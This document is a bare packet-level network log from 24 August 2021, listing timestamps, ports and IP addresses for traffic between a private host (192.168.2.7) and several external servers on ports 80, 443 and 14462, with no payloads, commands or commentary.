Aug 24, 2021 08:46:56.954721928 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954721928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954739094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954755068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954771996 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954776049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954793930 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954811096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954812050 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954828024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954828978 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954844952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954860926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954862118 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954878092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954895020 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954983950 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977015018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977056980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977087021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977118015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977153063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977183104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977193117 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977206945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977226973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977242947 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977255106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977268934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977281094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977302074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977327108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977328062 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977353096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977375984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977395058 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977401018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977422953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977433920 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977447987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977482080 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977483034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977499962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977518082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977519035 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977538109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977555037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977570057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977581024 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977588892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977605104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977622986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977622986 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977639914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977655888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977675915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977680922 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977694988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977710009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977720022 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977729082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977745056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977751970 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977761984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977777958 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977782011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977799892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977801085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977819920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977838039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977842093 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977854967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977869987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977885962 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977890015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977914095 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.977955103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977971077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.977986097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.978018045 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.978053093 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:57.090908051 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:57.096286058 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:57.282160997 CEST	49717	443	192.168.2.7	74.114.154.22
Aug 24, 2021 08:46:57.397207022 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:57.397346973 CEST	49717	443	192.168.2.7	74.114.154.22
Aug 24, 2021 08:46:57.425240040 CEST	49717	443	192.168.2.7	74.114.154.22
Aug 24, 2021 08:46:57.540144920 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:57.540179968 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:57.540200949 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:57.540219069 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:57.540234089 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:57.540249109 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:57.540261984 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:57.540282011 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:57.540299892 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:57.540316105 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:57.540344954 CEST	49717	443	192.168.2.7	74.114.154.22
Aug 24, 2021 08:46:57.540390968 CEST	49717	443	192.168.2.7	74.114.154.22
Aug 24, 2021 08:46:57.654660940 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:57.654762983 CEST	49717	443	192.168.2.7	74.114.154.22
Aug 24, 2021 08:46:57.669276953 CEST	49717	443	192.168.2.7	74.114.154.22
Aug 24, 2021 08:46:57.669365883 CEST	49717	443	192.168.2.7	74.114.154.22
Aug 24, 2021 08:46:57.805840969 CEST	49718	14462	192.168.2.7	185.230.143.48
Aug 24, 2021 08:46:57.831161022 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:57.851494074 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:57.851699114 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:57.855310917 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:57.857186079 CEST	14462	49718	185.230.143.48	192.168.2.7
Aug 24, 2021 08:46:57.857523918 CEST	49718	14462	192.168.2.7	185.230.143.48
Aug 24, 2021 08:46:57.867074013 CEST	49718	14462	192.168.2.7	185.230.143.48
Aug 24, 2021 08:46:57.875528097 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:57.918912888 CEST	14462	49718	185.230.143.48	192.168.2.7
Aug 24, 2021 08:46:57.973056078 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:57.975380898 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.006998062 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.027362108 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.027499914 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.027529001 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.027551889 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.027578115 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.027587891 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.027601957 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.027623892 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.027625084 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.027650118 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.027666092 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.027674913 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.027697086 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.027698040 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.027720928 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.027734995 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.027777910 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048347950 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048389912 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048414946 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048427105 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048441887 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048449993 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048465967 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048469067 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048491001 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048491955 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048515081 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048515081 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048536062 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048538923 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048557043 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048563004 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048583984 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048587084 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048609018 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048610926 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048625946 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048638105 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048664093 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048686028 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048686981 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048712015 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048734903 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048749924 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048758984 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048774958 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048780918 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048796892 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048804045 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048830032 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048830986 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.048850060 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.048872948 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069196939 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069231033 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069257975 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069272995 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069279909 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069303989 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069312096 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069328070 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069350958 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069371939 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069376945 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069395065 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069406986 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069418907 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069443941 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069464922 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069467068 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069483995 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069500923 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069508076 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069520950 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069546938 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069557905 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069571972 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069597960 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069598913 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069622040 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069622993 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069643974 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069664955 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069664955 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069693089 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069698095 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069720984 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069746971 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069753885 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069772959 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069792986 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069801092 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069817066 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069827080 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069844007 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069864035 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069864035 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069885969 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069899082 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069912910 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069935083 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069935083 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069957972 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069978952 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.069979906 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.069999933 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.070003033 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.070030928 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.070034027 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.070060968 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.070061922 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.070086002 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.070087910 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.070107937 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.070116997 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.070138931 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.070142984 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.070171118 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.070194006 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.077892065 CEST	49718	14462	192.168.2.7	185.230.143.48
Aug 24, 2021 08:46:58.090667963 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.090698957 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.090722084 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.090745926 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.090774059 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.090775013 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.090797901 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.090817928 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.090821981 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.090845108 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.090846062 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.090872049 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.090894938 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.090898991 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.090904951 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.090918064 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.090918064 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.090939999 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.090939999 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.090962887 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.090967894 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.090982914 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.090991020 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091001034 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091016054 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091029882 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091042995 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091068983 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091077089 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091090918 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091094017 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091125011 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091130018 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091142893 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091161013 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091169119 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091185093 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091216087 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091227055 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091243982 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091253996 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091268063 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091288090 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091294050 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091315031 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091319084 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091337919 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091344118 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091357946 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091367006 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091381073 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091392040 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091404915 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091414928 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091434956 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091438055 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091451883 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091461897 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091484070 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091487885 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091501951 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091512918 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091522932 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091536999 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091559887 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091562033 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091573954 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091583967 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091604948 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091605902 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091628075 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091629028 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091644049 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091653109 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091669083 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091679096 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091701031 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091701031 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091722012 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091723919 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091746092 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091747999 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091768980 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091769934 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091789961 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091793060 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091815948 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091816902 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091834068 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091837883 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091856003 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091864109 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091872931 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.091887951 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091906071 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.091922045 CEST	80	49719	188.34.200.103	192.168.2.7
